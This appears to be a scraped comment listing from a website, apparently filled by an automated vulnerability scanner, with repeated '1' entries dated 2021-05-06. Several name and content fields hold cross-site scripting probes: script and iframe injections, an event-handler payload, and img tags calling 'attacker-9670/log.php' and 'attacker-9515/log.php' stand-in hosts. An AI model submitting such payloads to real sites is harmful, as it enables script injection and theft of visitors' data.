 • pHqghUme

  2021-05-06 07:38:59


  1


 • pHqghUme

  2021-05-06 07:38:58


  1


 • pHqghUme

  2021-05-06 07:38:58


  1


 • pHqghUme

  2021-05-06 07:38:57


  1


 • pHqghUme

  2021-05-06 07:36:40


  1


 • pHqghUme

  2021-05-06 07:36:20


  1


 • pHqghUme

  2021-05-06 07:36:07


  1Fr3S8veO


 • 1aAFiBxlO

  2021-05-06 07:36:05


  1


 • pHqghUme

  2021-05-06 07:36:03


  1


 • pHqghUme

  2021-05-06 07:36:00


  1


 • pHqghUme

  2021-05-06 07:20:15


  1


 • pHqghUme<FwGgVQ<

  2021-05-06 02:48:06


  1


 • pHqghUme<img sRc='http://attacker-9670/log.php?

  2021-05-06 02:47:57


  1


 • pHqghUme<tVjRWd x=9104>

  2021-05-06 02:47:45


  1


 • pHqghUme

  2021-05-06 02:47:40


  1<b8ZUaS<


 • pHqghUme<WP2MQF>HOVIP[!+!]</WP2MQF>

  2021-05-06 02:47:14


  1


 • pHqghUme

  2021-05-06 02:47:13


  1<img sRc='http://attacker-9515/log.php?


 • pHqghUme

  2021-05-06 02:46:54


  1<CI2YIK x=9998>


 • pHqghUmeqUeNd <ScRiPt >6hKt(9762)</ScRiPt>

  2021-05-06 02:46:52


  1


 • pHqghUme

  2021-05-06 02:46:38


  1<ifRAme sRc=9439.com></IfRamE>


 • pHqghUme<% contenteditable onresize=6hKt(9891)>

  2021-05-06 02:46:33


  1